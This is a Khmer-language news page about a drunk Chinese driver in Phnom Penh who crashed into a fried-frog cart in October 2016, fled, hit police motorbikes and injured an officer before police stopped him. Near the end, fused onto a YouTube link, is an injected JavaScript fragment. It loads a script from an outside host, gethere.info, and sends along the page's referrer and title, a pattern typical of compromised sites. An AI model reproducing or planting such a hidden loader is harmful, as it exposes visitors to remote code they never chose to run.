Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

រថយន្តចង់សីុកង្កែប ជនជាតិចិនស្រវឹងបើកបុករងការខូចខាត

ភ្នំពេញ៖ បុរសជនជាតិចិនម្នាក់ស្រវឹងស្រាបើក ហាយ ឡែនឌ័រទៅបុករទេះលក់កង្កែបបំពងដែលចតកំពុងលក់បណ្ដាលរងការខូចខាតទាំងស្រុងរថយន្តព្យាយាមបើករត់ត្រូវសមត្ថកិច្ចឃាត់បាននៅបុរីប៉េងហួត។  ហេតុការណ៍នេះកើតឡើងកាលវេលាម៉ោង១និង២០នាទីរំលងអធ្រាតឈានចូលថ្ងៃទី១៨ ខែតុលា ឆ្នាំ២០១៦
ស្ថិតតាមផ្លូវមាត់ទន្លេចំណុចសណ្ឋាគារឥណ្ឌូចិនក្នុងសង្កាត់ផ្សារកណ្ដាល១ខណ្ឌដូនពេញ។

យោងតាមសាក្សីឃើញហេតុការណ៍បានអោយដឹងថាមុនពេលកើតហេតុគេឃើញបុរសជាជនជាតិចិនម្នាក់បើករថយន្តហាឡែនឌ័រពណ័ទឹកប្រាក់ពាក់ស្លាកលេខភ្នំពេញ.2.T4860 បើកតាមបណ្ដោយផ្លូវស៊ីសុវត្ថទិសដៅពីត្បូងទៅជើងស្រវឹងស្រាជោគខណៈមកដល់ចំណុចកើតហេតុខាងលើបានរេចង្កូតទៅបុករទេះលក់កង្កែបបំពងដែលចតកំពុងលក់ដូរបណ្ដាលរងការខូចខាតទាំងស្រុងរួចរថយន្តបង្កមិនព្រមឈប់ទទួលខុសត្រូវទេព្យាយាមបើករត់រហូតតាមផ្លូវមន្ទីរពេទ្យអង្គរឌួងបានទៅបុកម៉ូតូប៉ុលិស្តិ៍ស្រះចករងការខូចខាត២គ្រឿងនៅមិនព្រមឈប់ទៀតបានបើកបន្តទៅមុខទៀតត្រូវសមត្ថកិច្ចដេញតាមពីក្រោយក៍ត្រូវរថយន្តបង្កនោះបានគៀរម៉ូតូប៉ុលិស្តិ៍បណ្ដាលរងរបួសរយៃដៃខាងស្ដាំរួចបើករត់បន្តទៀតរហូតដល់បុរីប៉េងហួតទើបសមត្ថកិច្ចឃាត់បានដោយសារថយន្តនោះបែកកង់មុខ។

ក្រោយកើតហេតុសមត្ថកិច្ចជំនាញធ្វើការវាស់វែងយករថយន្តបង្កទៅការិយាល័យចរាចរណ៍ជើងគោកនៃស្នងការរាជធានីភ្នំពេញរង់ចាំធ្វើការដោះស្រាយជាក្រោយ។ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធិ

https://youtu.be/Fy6Mpd4DQqEs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More